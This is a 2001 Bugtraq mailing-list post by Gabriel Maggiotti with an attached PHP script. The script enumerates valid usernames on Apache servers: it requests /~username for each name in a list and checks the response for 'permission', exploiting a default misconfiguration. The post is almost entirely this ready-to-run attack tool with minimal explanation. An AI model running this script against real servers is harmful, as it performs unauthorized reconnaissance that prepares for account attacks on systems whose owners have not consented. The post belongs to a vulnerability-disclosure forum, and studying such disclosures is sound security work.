[22701] in bugtraq
script to find apache users
daemon@ATHENA.MIT.EDU (gabriel maggiotti)
Fri Sep 21 12:25:08 2001
Message-ID: <3BAA978F.A9C4A044@ciudad.com.ar>
Date: Thu, 20 Sep 2001 22:27:43 -0300
From: gabriel maggiotti <gmaggiot@ciudad.com.ar>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: multipart/mixed;
boundary="------------8DF7A973D5A8EC7BB6E590A6"
--------------8DF7A973D5A8EC7BB6E590A6
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
--------------8DF7A973D5A8EC7BB6E590A6
Content-Type: text/plain; charset=us-ascii;
name="apache.php"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="apache.php"
#!/usr/local/bin/php -q
<?
/*
default misconfiguration which could allow remote users
to determine whether a give username exists on the vulnerable system.
By Gabriel A Maggiotti
*/
if( $argc!=4)
{
echo "usagge: $argv[0] <host> <userlist> <delay>\n";
return 1;
}
$host=$argv[1];
$userlist=$argv[2];
$fd = fopen ($userlist, "r");
while (!feof ($fd)) {
$user = fgets($fd, 4096);
$fp = fsockopen ($host, 80 , &$errno, &$errstr, 30);
fputs ($fp, "GET /~$user HTTP/1.0\r\n\r\n");
while (!feof ($fp)) {
$sniff=fgets($fp,1024);
if(strpos($sniff,"permission")!="") {
echo "$user exists!!!\n";
break;
}
}
fclose ($fp);
sleep(3);
}
fclose ($fd);
?>
--------------8DF7A973D5A8EC7BB6E590A6--
